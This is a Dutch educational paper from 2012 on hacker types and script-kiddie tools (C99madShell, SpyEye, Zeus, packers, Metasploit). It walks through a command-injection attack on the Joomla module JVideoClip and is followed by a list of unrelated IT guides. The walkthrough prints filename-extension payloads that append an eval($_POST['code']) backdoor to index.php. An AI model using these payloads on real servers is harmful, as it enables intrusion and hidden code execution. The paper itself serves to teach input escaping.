Hacken, Script Kiddies en Script Kiddie Tools

Maat: px
Weergave met pagina beginnen:

Download "Hacken, Script Kiddies en Script Kiddie Tools"

Transcriptie

1 Hacken, Script Kiddies en Script Kiddie Tools Gerben van Veenendaal juni 2012 Soorten hackers Er is niet zoiets als de hacker. Binnen de hackingcommunitie bestaan verschillende stromingen. De verschillende soorten hackers zijn: Hacker of White Hat Hacker Een hacker is iemand die inbreekt in computersystemem. Dit doet hij echter niet voor geldelijk gewin. De hacker gaat de uitdaging aan om een van te voren bepaald systeem te penetreren. Hij gaat net zo lang door tot hij een manier gevonden heeft om in het syteem in te breken. De hacker heeft een zeer goede kennis van zo n beetje alle computertechnologie. De hacker heeft onder andere een zeer goede kennis van assembly. Hij weet welke denkfouten de meeste programmeurs maken en buit die uit. Na een succesvolle inbraak zal hij een bericht achterlaten op het systeem of versturen aan de systeembeheerder over de inbraak en hoe deze te voorkomen is. Hierna zal hij een moeilijker te penetreren systeem proberen te hacken. De hacker wil laten zien hoe slecht de beveiliging is van veelgebruikte systemen. Hackers ergeren er zich aan dat hun activiteiten illegaal zijn. Een hacker wordt ook wel een white hat hacker genoemd. Cracker of Black Hat Hacker De cracker of black hat hacker heeft dezelfde vaardigheden als de hacker, maar gebruikt deze wel voor geldelijk gewin of kwalijke doeleinden. Zijn doel is om geld te verdienen, systemen te vernielen of zijn ideologie te verspreiden. Een hacker een cracker noemen is een grote belediging. Ook ergeren hackers zich eraan dat de media de definities vaak door elkaar haalt. Gray Hat Hacker De gray hat hacker valt tussen de vorige twee definities in. Het is hem niet om geldelijk gewin te doen, maar af en toe een grap uit halen met een systeem moet kunnen. Bijvoorbeeld door de tekst van een nieuwsbericht op een nieuwssite een klein beetje aan te passen. De gray hat hacker contacteert vaak een bedrijf niet, maar geeft de manier van het uitbuiten van het lek (de exploit) vrij aan het publiek. Vervolgens kijkt hij hoe het bedrijf erop reageert. Hij is bereid om de wet te overtreden (anders dan het inbreken in een systeem) om verbetering van de beveiliging te bewerkstelligen. De meeste echte hackers zijn gray hat hackers. 1

2 Script Kiddie De script kiddie hackt omdat het stoer is. Hij weet niet heel veel van de technologie af, maar doet wel alsof. Hij is erg goed in het drukken van knoppen. Hij gebruikt het hacken om zijn populariteit te vergroten, niet om de kick om een complex probleem op te lossen. Hackers ergeren zich aan script kiddies omdat het hen om de technogie te doen is, en de hackerscommunitie een slechte naam geven. De script kiddie hackt niet echt, maar gebruikt tools die het hacken voor hem doen. Deze tools zijn geschreven door hackers. De script kiddie kiest niet eerst zijn doel, en hackt die vervolgens. Hij kiest eerst zijn middel (de tools), en kijkt vervolgens waar hij dat middel op toe kan passen. 2

3 Script Kiddie Tools Script kiddies zijn dus zo sterk als hun tools. Maar welke tools zijn er zoal, en waar worden ze voor gebruikt? Hieronder een overzicht van enkele gebruikte tools. De Exploit De exploit is een belangrijke tool. Een exploit is een geautomatiseerde hack in de vorm van een script. Deze scripts kunnen in allerlei talen geschreven worden. Veelgebruikte talen zijn Perl, Ruby, Python, Bash, C en Assembly. Exploits zijn voor de meeste gevonden lekken binnen enkele dagen online. Vaak presenteert een hacker zijn gevonden lek ook met een exploit die het uitbuit. Exploits zijn te vinden in online databases, waarin je kunt zoeken op de software die je wilt hacken. Een echte hacker maakt exploits, maar script kiddies gebruiken ze slechts. Vaak zijn de exploits gedeeltelijk configureerbaar, zodat je een bijvoorbeeld een doel in kunt stellen, of andere informatie die nodig is voor de lek. Dit maakt dat er nog enige moeite vereist is om de exploit uit te voeren. Tegenwoordig bestaat er ook een geautomatiseerde exploit-uitvoer-tool, die ook de configuratie overbodig maakt. Hierover later meer. Figuur 1: Een exploit database website. 3

4 C99madShell C99madShell is een tool die gebruikt wordt voor het hacken van servers. Het is één lang PHP script, dat geupload moet zijn om hem te gebruiken. Eerst moet er dus een mogelijkheid zijn om een PHP bestand op de website te uploaden, bijvoorbeeld door een exploit uit te voeren. Daarna kun je de tool gebruiken om je mogelijkheden op de server gemakkelijk uit te breiden. De tool heeft veel mogelijkheden: het heeft een file browser om bestanden te bekijken, een command line interface om commando s uit te voeren, het kan alle PHP informatie laten zien (modules, instellingen, etc.), je kunt er de lopende processen mee bekijken, het kan bestanden uploaden, zoeken, bewerken en verwijderen, SQL uitvoeren, PHP code uitvoeren, FTP wachtwoorden bruteforcen en nog veel meer. Het script zelf is ongeveer 45 Kb en gebruikt een simpele methode om de broncode te verkleinen en te verbergen. Het bevat de volgende PHP code: e v a l ( g z i n f l a t e ( base64_decode ( Lange ge g z i p t e base64 geencodeerde s t r i n g. ) ) ) ; Zelfs een script kiddie kan dat nog gemakkelijk decoderen. Gzip comprimeert code ongeveer tot 30% van de oorspronkelijke grootte. Base64 vergroot de code echter met 33%. Hoewel het de code niet zo goed obfuscate, zorgt het dus wel voor een reductie van 60% in grootte van de code. Figuur 2: C99madShell 2.0 madnet edition in actie. 4

5 SpyEye en Zeus SpyEye en Zeus zijn viruscreatietools. Ze bieden beide een gemakkelijke applicatie waarmee je je eigen trojan kunt bouwen. Deze applicatie biedt een aantal opties om het virus te laten voldoen aan je persoonlijke behoeften. Zo bieden ze bijvoorbeeld de mogelijkheid om keylogging in het virus te stoppen. Deze optie maakt ook screenshots als een gebruiker klikt, voor onscreen toetsenborden. Ook kan met het aangemaakte virus automatisch creditcardgegevens verzameld worden. SpyEye heeft ook de mogelijkheid om zelfgemaakte plugins toe te voegen. Deze plugins worden ook commercieel verkocht. Zo is er een plugin waarmee je willekeurige commando s uit kunt voeren op het doelsysteem. SpyEye heeft verder nog de optie om zijn concurrent Zeus uit te schakelen. Je moet een IP-adres aangegeven waar de gegevens naar worden verstuurd. In een administratiepaneel van het virus kun je dan alle verzamelde gegevens bekijken. Beide virustools worden commercieel verkocht op hackersforums. Er verschijnen regelmatig updates met support voor nieuwe platformen of met nieuwe security-omzeil-technieken. Ironisch genoeg verschijnen op dezelfde forums ook cracks voor de tools waarmee je de trial versie kunt activeren. Deze tools zijn erg bruikbaar om botnets op te zetten. Het aangemaakte virus verspreid zich echter niet automatisch. Figuur 3: SpyEye trojan generator en Zeus zijn administratie paneel. Packer Een packer is een tool die een executable neemt en deze comprimeert en (white box) encrypteert. Hij voegt een loader toe die vervolgens deze geëncrypteerde data decrypteert en uitvoert. Ook zitten er vaak technieken in om de code te obfuscaten. Obfuscation is een techniek die assemblycode slecht leesbaar maakt, en static analysers het verkeerde spoor zet. Packers voegen bijvoorbeeld random data in, en jumpen hier vervolgens overeen. Ook laten ze het lijken alsof bepaalde stukken assembly methoden zijn, terwijl dat niet zo is. Packers voegen ook vaak anti-debugger checks in. Zo voegt hij bijvoorbeeld een check in die bepaalde assembly afloopt om te kijken of er breakpoints zijn ingevoegd. 5

6 Het doel van de hacker met deze tool is voornamelijk om analyse van een virus moeilijk te maken, zodat virusscanners de executable niet detecteren als een virus. Een bekende packer is de open source packer UPX, maar er zijn er nog veel meer, met allemaal verschillende features. TrojanToWorm TrojanToWorm is een tool om een bestaande trojan om te zetten in een worm. Een trojan is een virus die zelf geen middelen heeft om zich voort te planten. Een worm plant zich wel voort. Deze tool voegt dus de mogelijkheid toe aan een virus om zich voort te planten. Zo infecteert het automatisch USB sticks zodat als ze in een andere computer worden ingeplugd, ze het virus verspreiden. Ook zitten er trucks in om virusscanners te omzeilen, ervoor te zorgen dat het virus niet twee keer draait, en packing met de bekende UPX packer. Figuur 4: TrojanToWorm 2.0 in actie. IP en Port Scanner Een IP scanner is een tool waarmee je een range van IP-addressen kunt pingen om te kijken of ze bestaan. Sommige tools bedenken zelf ranges en laten de gebruiker instellen hoe veel live IP-addressen ze willen hebben. Een script kiddie kan hiermee potentiele doelen vinden voor aanvallen met exploits. 6

7 Een port scanner scant voor een bepaald IP-adres een reeks bekende poorten af op zoek naar services. Dit doet hij simpelweg door met elke poort een TCP connectie op te zetten en te kijken of het lukt. Vaak zitten port scanners bij IP scanners inbegrepen. Port scanners worden veel gebruikt door hackers omdat het de enige methode is om te kijken welke services een machine draait als je geen toegang tot de machine hebt. Metasploit Metasploit is een tool die hacken automatiseert. Er zit een IP en port scanner in waarmee je een range IP-adressen kunt scannen. Metasploit detecteert automatisch welke services er op de machines draaien en geeft hier een overzicht van. Vervolgens zoekt Metasploit bij de versies van de draaiende services alle gepubliceerde exploits op. Deze draait hij dan één voor één. Je kunt ook zelf exploits selecteren die uitgevoerd moeten worden. Om een exploit te laten werken in Metasploit moet hij in Ruby geschreven zijn en het Metasploit framework gebruiken. Een Metasploit exploit heeft twee fasen: een detectiefase waarin gedetecteerd wordt of de hack uitgevoerd kan worden en een uitvoeringsfase waarin hij daadwerkelijk uitgevoerd wordt. Een Metasploit exploit geef je vaak een payload mee, dat is een stuk code die je wilt uitvoeren op het doelsysteem. Metasploit biedt zelf al vele van zulke payloads aan, zoals bijvoorbeeld een shell payload, waarmee je willekeurige commando s kunt uitvoeren op het systeem, of een VNC server waarmee je het doelsysteem kunt overnemen. Figuur 5: Metasploit pro in actie. 7

8 Een voorbeeldhack van JVideoClip In dit hoofdstuk zal ik een voorbeeld geven van hoe een hack gedaan wordt, en waar de script kiddie met zijn tools te voorschijn komt. Het doel opstellen en zwakheden zoeken Stel, we willen een bepaalde site hacken. Allereerst onderzoeken we ons doel. We kijken welke frameworks de site gebruikt, en wat voor software het systeem draait. Verder kijken we naar mogelijke zwakheden in het systeem. Het blijkt dat het desbetreffende systeem op Joomla draait, een populair webframework. Ook blijkt dat het de gebruiker in staat stelt om filmpjes te uploaden met behulp van een Joomla module, JVideoClip. In code voor het uploaden van bestanden worden vaak fouten gemaakt. Dit is dus een mogelijke zwakke plek van het systeem. De uploadprocedure De JVideoClip module is open source, en dus gaan we op zoek naar zwakheden in de code. Omdat een upload procedure vaak fouten bevat, bekijken we deze goed. De code listing van het uploadmechanisme staat in site/controller.php en bevat: //add video $ a r r v i d e o = $_FILES [ video ] ; f o r ( $ i = 0 ; $ i < count ( $ a r r v i d e o [ name ] ) ; $ i++) { $filename_ without_ ext = md5( microtime ( ) ) ; $ext_pos = s t r r c h r ( $ a r r v i d e o [ name ] [ $ i ],. ) ; $ v i d e o f u l l p a t h = $upload_folder. DS. $filename_without_ext. $ext_pos ; $filename_without_ext_fullpath = $upload_folder. DS. $filename_without_ext ; move_uploaded_file ( $ a r r v i d e o [ tmp_name ] [ $ i ], $ v i d e o f u l l p a t h ) ; c o n v e r t v i d e o ( $ v i d e o f u l l p a t h, $filename_without_ext_fullpath ) ;... Het eerste wat dit stukje probeert te doen is een niet te raden oneway hash aanmaken met hehulp van het Message-Digest-5 algoritme van de huidige tijd. De functie microtime geeft de huidige tijd in milliseconden van het systeem. Hoewel deze niet te raden is, is hij wel te bruteforcen. De huidige tijd in seconden kan namelijk makkelijk verkregen worden, en er zijn maar 1000 milliseconden in een seconde, dus met 2000 pogingen is deze hash goed te bruteforcen. Dit is dus geen goede methode. Beter zou het zijn om een hash te maken van een random string met voldoende entropie. Vervolgens pakt hij de extensie van de bestandsnaam die we uploaden. Dit doet hij door het stuk van de bestandsnaam vanaf de laatste punt te nemen. Het script verplaatst dan het 8

9 bestand van zijn tijdelijke locatie naar een nieuwe locatie door als bestandsnaam de hash te nemen en als extensie de originele extensie. Merk op dat dit erg gevaarlijk is. De hash is te bruteforcen, en de extensie kan bijvoorbeeld php zijn. Als de locatie dus bereikbaar is via de webserver, dan is het vrij triviaal om code te uploaden en uit te voeren. Dat deze hack niet mogelijk is zullen we later laten zien. De volgende stap is het converteren van de geuploade video. Dit wordt gedaan met behulp van een convertvideo functie in site/libraries/common.php die de volgende definitie heeft: f u n c t i o n c o n v e r t v i d e o ( $adres, $filename_without_ext_fullpath ) { g l o b a l $mainframe ; $par = &$mainframe >getparams ( com_jvideoclip ) ; $str_ffmpeg_path = $par >g e t ( ffmpeg_path ) ; $ s t r _ f l v t o o l 2 _ p a t h = $par >get ( f l v t o o l 2 _ p a t h ) ; i f ( s t r i p o s (php_uname( s ), windows )!== f a l s e ) { exec ( $str_ffmpeg_path. " i \" ". $adres. " \" ar ab 64 b 750k r 25 f f l v y s 320 x240 \" ". $filename_without_ext_fullpath. ". f l v \" 2>&1 ", $res, $ e r r ) ; exec ( $ s t r _ f l v t o o l 2 _ p a t h. " U \" ". $filename_without_ext_fullpath. ". f l v \" " ) ; exec ( $str_ffmpeg_path. " y i \" ". $filename_without_ext_fullpath. ". f l v \" f mjpeg s 150 x110 vframes 1 s s 8 an \" ". $filename_without_ext_fullpath. ". small. jpg \" " ) ; e l s e { exec ( $str_ffmpeg_path. " i ". $adres. " ar ab 64 b 750 k r 25 f f l v y s 320 x240 ". $filename_without_ext_fullpath. ". f l v 2>&1 ", $res, $ e r r ) ; exec ( $ s t r _ f l v t o o l 2 _ p a t h. " U ". $filename_without_ext_fullpath. ". f l v " ) ; exec ( $str_ffmpeg_path. " y i ". $filename_without_ext_fullpath. ". f l v f mjpeg s 150 x110 vframes 1 s s 8 an ". $filename_without_ext_fullpath. ". small. jpg " ) ; i f ( J F i l e : : e x i s t s ( $adres ) ) { J F i l e : : d e l e t e ( $adres ) ; Hier wordt met een bepaalde videoconversietool het verplaatste bestand omgezet in een flv bestand. Dit wordt gedaan via de command line. Merk op dat de variabele adres hier als veilig wordt beschouwd en zonder escaping ingevoegd wordt. Onder Windows wordt het pad nog gequote. Onder andere systeem niet eens. We weten echter dat we de extensie van het pad in adres volledig zelf kunnen bepalen. We zouden dus een command line injectie kunnen proberen. Aan het eind van de code wordt nog het originele bestand verwijderen. Dat is de reden dat de code upload hack niet werkt, het bestand wordt namelijk direct weer verwijderd. 9

10 Injectie via bestandsnaam We willen dus de command line injecten via een bestandnaamextensie. De volgende vraag luidt dus: wat laat PHP toe aan tekens voor bestandsnamen? Dit hangt er vanaf hoe PHP de RFC 1867 (Form Based File Upload in HTML) implementeerd. Het code gedeelte dat we nodig hebben staat in main/rfc1867.c en is: i f ( ( cd = php_mime_get_hdr_value ( header, " Content D i s p o s i t i o n " ) ) ) { char p a i r = NULL; while ( i s s p a c e ( cd ) ) { ++cd ; while ( cd && ( p a i r = php_ap_getword(&cd, ; ) ) ) { char key = NULL, word = p a i r ; while ( i s s p a c e ( cd ) ) { ++cd ; i f ( s t r c h r ( pair, = ) ) { key = php_ap_getword(& pair, = ) ; i f (! strcasecmp ( key, " name " ) ) { i f ( param ) { e f r e e ( param ) ; param = php_ap_getword_conf(& p a i r TSRMLS_CC) ; e l s e i f (! strcasecmp ( key, " f i l e n a m e " ) ) { i f ( f i l e n a m e ) { e f r e e ( f i l e n a m e ) ; f i l e n a m e = php_ap_getword_conf(& p a i r TSRMLS_CC) ;... char s = s t r r c h r ( filename, \\ ) ; i f ( ( tmp = s t r r c h r ( filename, / ) ) > s ) { s = tmp ; i f ( s && s >= f i l e n a m e ) { s a f e _ p h p _ r e g i s t e r _ v a r i a b l e ( lbuf, s +1, s t r l e n ( s +1), NULL, 0 TSRMLS_CC) ; e l s e { s a f e _ p h p _ r e g i s t e r _ v a r i a b l e ( lbuf, filename, s t r l e n ( f i l e n a m e ), NULL, 0 TSRMLS_CC) ;... 10

11 De header waarin de bestandnaam staat heeft de vorm: Content D i s p o s i t i o n : attachment ; f i l e n a m e=" bestandnaam. e x t e n s i e " Bovenstaande code detecteert deze header en haalt de filename eruit met de functie php_ap_getword_conf. Deze functie laat alle characters door, dus geeft geen beperkingen op de inhoud. Later in de code wordt echter alles tot en met de laatste back slash of forward slash weggehaald. Die tekens kunnen we dus niet gebruiken. Omdat we een extensie injecteren, kunnen we ook geen punt gebruiken. Dit limiteert ons behoorlijk, want dit zijn veelgebruikte tekens in commando s. Code execution Uiteindelijk willen we willekeurige PHP code kunnen uitvoeren op de server. Dit kunnen we doen door bijvoorbeeld de volgende code aan het einde van index.php toe te voegen: e v a l ($_POST[ code ] ) ; Zo kunnen we via een HTTP POST request met een code waarde onopgemerkt PHP code uitvoeren. Normaal zouden we zoiets doen met: echo e v a l ($_POST[ code ]); > > index. php Maar dat gebruikt een punt, waardoor het niet werkt. In plaats hiervan kunnen we een for loop gebruiken die alleen over index.php loopt met behulp van een wildcard: ; f o r f i n index php ; do echo e v a l ($_POST[ code ]); > > $ f ; done ; Onder Windows werkt dat niet, daar gebruiken we: " f o r %G IN ( index php ) DO echo e v a l ($_POST[ code]);>>%g echo " Merk op dat we onder Windows ook nog even de quote moeten sluiten. Als we bovenstaande code als de extensie gebruiken van een bestandsnaam die we uploaden, is de hack compleet. De exploit Natuurlijk willen we deze hack niet handmatig uitvoeren, al was het alleen al omdat Windows ons niet toestaat een bestand aan te maken met een quote erin. Dus maken we een exploit in Ruby die het Metasploit framework gebruikt. We geven de mogelijkheid om een PHP payload te specificeren die uitgevoerd moet worden. Ten slotte uploaden we de exploit op een exploit database site om hem publiek te maken. Conclusie Wat we van deze aanval kunnen leren is dat je nooit data moet vertrouwen die van de gebruiker komt. Zelfs niet een extensie van een bestandsnaam die geupload wordt. Escape altijd de data die binnenkomt voordat je hem gebruikt in bijvoorbeeld een commando. 11

XAMPP Web Development omgeving opzetten onder Windows.

XAMPP Web Development omgeving opzetten onder Windows. XAMPP Web Development omgeving opzetten onder Windows. Inhoudsopgave 1. Lees dit eerst... 2 2. Inleiding... 2 1 Xampp downloaden... 2 2 Installatie Xampp 1.7.4 op externe harddisk... 3 3 XAMPP herconfiguren...

Nadere informatie

Handleiding Beveiligen van Wordpress

Handleiding Beveiligen van Wordpress Handleiding Beveiligen van Wordpress Deze handleiding beschrijft de stappen die u dient te nemen om uw Wordpress website te beveiligen Versie 1.0 Kies een sterk wachtwoord Gebruik als wachtwoord een combinatie

Nadere informatie

Installeer Apache2: Landstede februari 2009 versie 3 1 Bertil Hoentjen

Installeer Apache2: Landstede februari 2009 versie 3 1 Bertil Hoentjen Installeer Apache2: Deze howto gaat over name based virtual hosting onder Apache 2.x., en is getest onder OpenSUSE 11 maar is in feite ook van toepassing op de andere distributies. Alleen Debian en afgeleide

Nadere informatie

Xampp Web Development omgeving opzetten onder Windows.

Xampp Web Development omgeving opzetten onder Windows. Xampp Web Development omgeving opzetten onder Windows. Inhoudsopgave 1. Lees dit eerst... 2 2. Inleiding... 2 3. Installatie Xampp... 3 1.1 Installatie Xampp Launcher... 7 1.2 Controle geïnstalleerde bestanden...

Nadere informatie

Web Application Security Hacking Your Way In! Peter Schuler & Julien Rentrop

Web Application Security Hacking Your Way In! Peter Schuler & Julien Rentrop Web Application Security Hacking Your Way In! Peter Schuler & Julien Rentrop 1 Agenda Injection Cross Site Scripting Session Hijacking Cross Site Request Forgery #1 OWASP #2 top 10 #3 #5 Bezoek www.owasp.org

Nadere informatie

IdentySoft Basic Support Handleiding EasySecure International B.V.

IdentySoft Basic Support Handleiding EasySecure International B.V. IdentySoft Basic Support Handleiding EasySecure International B.V. +31(0)88 0000 083 Info@EasySecure.nl www.easysecure.nl Om onze dealers zo goed mogelijk bij te staan hebben wij het volgende document

Nadere informatie

IdentySoft Pro In gebruik stelling EasySecure International B.V.

IdentySoft Pro In gebruik stelling EasySecure International B.V. IdentySoft Pro In gebruik stelling EasySecure International B.V. +31(0)88 0000 083 Info@EasySecure.nl www.easysecure.nl De IdentySoft Pro software van EasySecure International wordt altijd volledig voorgeconfigureerd

Nadere informatie

Resultaten van de scan. Open poorten. High vulnerabilities. Medium vulnerabilites. Low vulnerabilities

Resultaten van de scan. Open poorten. High vulnerabilities. Medium vulnerabilites. Low vulnerabilities De Nessus scan We hebben ervoor gekozen om de webserver met behulp van Nessus uitvoerig te testen. We hebben Nessus op de testserver laten draaien, maar deze server komt grotendeels overeen met de productieserver.

Nadere informatie

TECHNICAL DESIGN DOCUMENT

TECHNICAL DESIGN DOCUMENT TECHNICAL DESIGN DOCUMENT BACHELORPROJECT IN3405 John Ciocoiu 1358227 Elwin Dokter 1275909 TECHNISCHE UNIVERSITEIT DELFT FACULTEIT EWI WOENSDAG 28 APRIL 2010 VERSIE 1 COMMISSIE: Ing. D.J. van Roest (opdrachtgever)

Nadere informatie

Analyse probleem remote execution

Analyse probleem remote execution Analyse probleem remote execution Karel Nijs 2005-09-28 1.1 Beschrijving van het project De bedoeling van de GUI is een gemakkelijke uitvoering van verschillende checks van ICs. De GUI moet in Tcl/Tk ontworpen

Nadere informatie

Web Presence Builder. Inhoud

Web Presence Builder. Inhoud Web Presence Builder Inhoud Inhoud... 1 Wat is Web Presence Builder?... 2 Het categoriescherm... 2 De eerste stappen naar een eigen website... 3 Onderwerp selecteren en website naam aanpassen... 3 Vooraf

Nadere informatie

Tutorial voor FTP, STMP en Telnet

Tutorial voor FTP, STMP en Telnet Tutorial voor FTP, STMP en Telnet Created by Benny Wouters on December 26, 2003 (1) Telnet commando s 1.1 Tabel met telnet commando s TELNET [host [port]] Open host [port] telnet sessie opstarten Maak

Nadere informatie

Installatie en configuratie documentatie

Installatie en configuratie documentatie Installatie en configuratie documentatie Assistance Web Portal v. 2.58, 2.60 Voor Windows 2003 / 2008 / XP / Vista / Windows 7 Assistance PSO handleiding, uitgegeven door Assistance Software. Alle rechten

Nadere informatie

Installatie en configuratie documentatie

Installatie en configuratie documentatie Installatie en configuratie documentatie Assistance Web Portal v. 2.x Voor Windows 2003 / XP / Vista Assistance PSO handleiding, uitgegeven door Assistance Software. Alle rechten voorbehouden. Niets uit

Nadere informatie

Port Redirection & Open Ports

Port Redirection & Open Ports Port Redirection & Open Ports Port Redirection & Open Ports In de DrayTek kunt u gebruik maken van zowel Port Redirection (ook wel Port Forwarding genoemd) en Open Ports. In deze handleiding zullen wij

Nadere informatie

Introductie Veiligheidseisen Exploiten Conclusie. Browser security. Wouter van Dongen. RP1 Project OS3 System and Network Engineering

Introductie Veiligheidseisen Exploiten Conclusie. Browser security. Wouter van Dongen. RP1 Project OS3 System and Network Engineering Browser security Wouter van Dongen RP1 Project OS3 System and Network Engineering Februari 4, 2009 1 Introductie Onderzoeksvraag Situatie van de meest populaire browsers Client-side browser assets vs.

Nadere informatie

Handleiding Migratie. Bronboek Professional

Handleiding Migratie. Bronboek Professional Handleiding Migratie Bronboek Professional Laatste wijziging: 25/02/2015 Inhoudsopgave Controles en acties vooraf pag. 1 Installatie en configuratie Microsoft SQL met de Bronboek Helpdesk Tool pag. 3 Migratie

Nadere informatie

WordPress in het Kort

WordPress in het Kort WordPress in het Kort Een website maken met Wordpress. In minder dan één uur online! Inclusief installatie van een thema en plugins Alle rechten 2013, Rudy Brinkman, BrinkhostDotCom, http://www.brinkhost.nl

Nadere informatie

Installatie SQL: Server 2008R2

Installatie SQL: Server 2008R2 Installatie SQL: Server 2008R2 Download de SQL Server 2008.exe van onze site: www.2work.nl Ga naar het tabblad: Downloads en meld aan met: klant2work en als wachtwoord: xs4customer Let op! Indien u een

Nadere informatie

HANDLEIDING DMS Plugin Installatie, configuratie & werking

HANDLEIDING DMS Plugin Installatie, configuratie & werking HANDLEIDING DMS Plugin Installatie, configuratie & werking Dit document is de handleiding voor de installatie, configuratie en werking van de DMS Plugin. Versie 1-12/09/2005 Inhoudstafel 1 Installatie...

Nadere informatie

Hacking demystified. De 5 P s en forensic readiness. Oscar Vermaas

Hacking demystified. De 5 P s en forensic readiness. Oscar Vermaas Hacking demystified De 5 P s en forensic readiness Oscar Vermaas Agenda Een beetje techniek Terminologie Context Hacking fases; de 5 P s Monitoring Forensic readiness Vormen van cybercrime Virussen/wormen/driveby

Nadere informatie

Handleiding installatie Rental Dynamics

Handleiding installatie Rental Dynamics Handleiding installatie Rental Dynamics Versie: 1.1 Datum: 9 januari 2015 1. Inleiding Deze handleiding beschrijft de procedure voor de installatie van Rental Dynamics en de benodigde software. In hoofdstuk

Nadere informatie

16. Web Station. In dit hoofdstuk komen de volgende onderwerpen aan bod:

16. Web Station. In dit hoofdstuk komen de volgende onderwerpen aan bod: 16. Web Station U kunt uw QNAP NAS gebruiken om een website te hosten. U kunt zelf een website bouwen in HTML of gebruik maken van één van de vele content management systemen die beschikbaar worden gesteld

Nadere informatie

De voordelen van Drupal

De voordelen van Drupal Drupal is een open source Content Management System (CMS). Daarnaast kun je Drupal zien als een framework, dit betekent dat je modules (oftewel mini-applicaties) kunt implementeren in je installatie van

Nadere informatie

Kies File>New>Blank Page>PHP. Je kunt eventueel nog een stylesheet koppelen. Definieer nu eerst een site! Dat betekent: Site>New Site

Kies File>New>Blank Page>PHP. Je kunt eventueel nog een stylesheet koppelen. Definieer nu eerst een site! Dat betekent: Site>New Site Kies File>New>Blank Page>PHP Je kunt eventueel nog een stylesheet koppelen. Definieer nu eerst een site! Dat betekent: Site>New Site Geef de site een passende naam. Kies ook de juiste map voor de webdocumenten.

Nadere informatie

Handleiding Faxdiensten

Handleiding Faxdiensten Handleiding Faxdiensten Auteur: Marketing Datum: 01-10-2014 Versie: 2.0 Aantal bladen: 12 Nummer: 1018 2 P a g i n a Inhoud 1. Inleiding... 3 2. Beheer E-Fax IN- en E-Fax OUT-diensten... 4 3. E-Fax-overzicht...

Nadere informatie

Handleiding aanmaak CSR

Handleiding aanmaak CSR Handleiding aanmaak CSR Voordat u begint: Om een Certificate Signing Request (CSR) te maken moet het programma OpenSSL geïnstalleerd worden. Dit programma kan geheel gratis gedownload worden vanaf de OpenSSL

Nadere informatie

Joomla & Security. Ing. Gertjan Oude Lohuis Byte Internet 19 november 2007

Joomla & Security. Ing. Gertjan Oude Lohuis Byte Internet 19 november 2007 Joomla & Security Ing. Gertjan Oude Lohuis Byte Internet 19 november 2007 2 Over mij Gertjan Oude Lohuis Studie: informatica Platformontwikkelaar/beheerder bij Byte. Uit rol van beheerder, maar ook uit

Nadere informatie

UNIX FAQ. Migratie naar een nieuwe server

UNIX FAQ. Migratie naar een nieuwe server UNIX FAQ Migratie naar een nieuwe server Shared Hosting Unix FAQ v5 NL 28032006 Pagina 1/13 Inhoudstafel 1. Inleiding...3 2. Inloggen...3 3. Register_globals in PHP...4 3.1 Wat is de optie register_globals

Nadere informatie

Aanmelden Na installatie wordt de service automatisch gestart en kunt u meteen aanmelden van op afstand:

Aanmelden Na installatie wordt de service automatisch gestart en kunt u meteen aanmelden van op afstand: Remote administratie Als administrator hebt u verschillende mogelijkheden om een Linux systeem van op afstand te beheren. Populaire toepassingen zijn bijvoorbeeld Webmin en VNC. Het gebruik van deze twee

Nadere informatie

VU POINT Camera Toevoegen

VU POINT Camera Toevoegen VU POINT Camera Toevoegen Installatie: Verbind de camera via een UTP kabel met de router. Sluit de 12v aan op de camera. Hierna zal de VU Point camera opstarten, waarna deze via DHCP een adres zal verkrijgen

Nadere informatie

Op de Virtual Appliance is MySQL voorgeïnstalleerd. MySQL is momenteel de meest gebruikte database op het internet.

Op de Virtual Appliance is MySQL voorgeïnstalleerd. MySQL is momenteel de meest gebruikte database op het internet. Het installeren van WordPress Nu je een volledig werkende virtuele server hebt is het tijd om er een applicatie op te installeren. We beginnen met de blogtool WordPress. De database De eerste stap is het

Nadere informatie

Aandachtspunten voor installatie suse in vmware server

Aandachtspunten voor installatie suse in vmware server Aandachtspunten voor installatie suse in vmware server Voorbereiden van vware virtueel machine: 1. Select linux Suse linux 2. Maak disksize 5Gb Denk er als je virtual machine wilt draaien op FAT32 vink

Nadere informatie

Handleiding aanmaak CSR

Handleiding aanmaak CSR Handleiding aanmaak CSR Voordat u begint: Om een Certificate Signing Request (CSR) te maken moet het programma OpenSSL geïnstalleerd worden. Dit programma kan geheel gratis gedownload worden vanaf de OpenSSL

Nadere informatie

Het Wepsysteem. Het Wepsysteem wordt op maat gebouwd, gekoppeld aan de gewenste functionaliteiten en lay-out van de site. Versie september 2010

Het Wepsysteem. Het Wepsysteem wordt op maat gebouwd, gekoppeld aan de gewenste functionaliteiten en lay-out van de site. Versie september 2010 Het Wepsysteem Het Wepsysteem is een content management systeem, een systeem om zonder veel kennis van html of andere internettalen een website te onderhouden en uit te breiden. Met het Content Management

Nadere informatie

Handleiding website. Inloggen Start uw internet browser en ga naar http://www.rbaoreven.nl/. Laatst bijgewerkt: 17 mei 2008

Handleiding website. Inloggen Start uw internet browser en ga naar http://www.rbaoreven.nl/. Laatst bijgewerkt: 17 mei 2008 Handleiding website Laatst bijgewerkt: 17 mei 2008 In deze handleiding staat alles wat u nodig heeft om een bericht op de website van de Reddingsbrigade Aoreven Heythuysen te plaatsen. Alles wordt in woord

Nadere informatie

Zicht - Content Management Systeem een algemene beschrijving

Zicht - Content Management Systeem een algemene beschrijving Zicht - Content Management Systeem een algemene beschrijving Versie april/2008 Zicht nieuwe media ontwerpers 2008 1 Inleiding Een Content Management Systeem (CMS) is een webapplicatie waarmee je zonder

Nadere informatie

SSL VPN. In deze handleiding zullen wij onderstaande SSL mogelijkheden aan u uitleggen. - SSL VPN account/groep creëren.

SSL VPN. In deze handleiding zullen wij onderstaande SSL mogelijkheden aan u uitleggen. - SSL VPN account/groep creëren. SSL VPN SSL VPN SSL VPN is een web based versie van VPN waarbij er geen VPN client software nodig is. Het wordt niet beperkt door netwerkomgevingen en is zeer eenvoudig te configureren. SSL staat voor

Nadere informatie

Handleiding installatie Hexagon Geospatial Software

Handleiding installatie Hexagon Geospatial Software Handleiding installatie Hexagon Geospatial Software Laatste update: 10-1-2014 1 Contents Stap 1: Software verkrijgen... 3 Stap 2: licentie verkrijgen... 4 Stap 3: Licentie inlezen... 6 Meer hulp nodig?...

Nadere informatie

WebHare Professional en Enterprise

WebHare Professional en Enterprise WebHare Professional en Enterprise Systeem module Systeem configuratie handleiding Datum: 19 november 2002 Aantal pagina s: 20 Versie: 2.01 Doelgroep: Sysops Inhoudsopgave Inleiding... 1 1 Vooraf... 2

Nadere informatie

LES 3: XAMPP OF MAMP. Lesoverzicht:

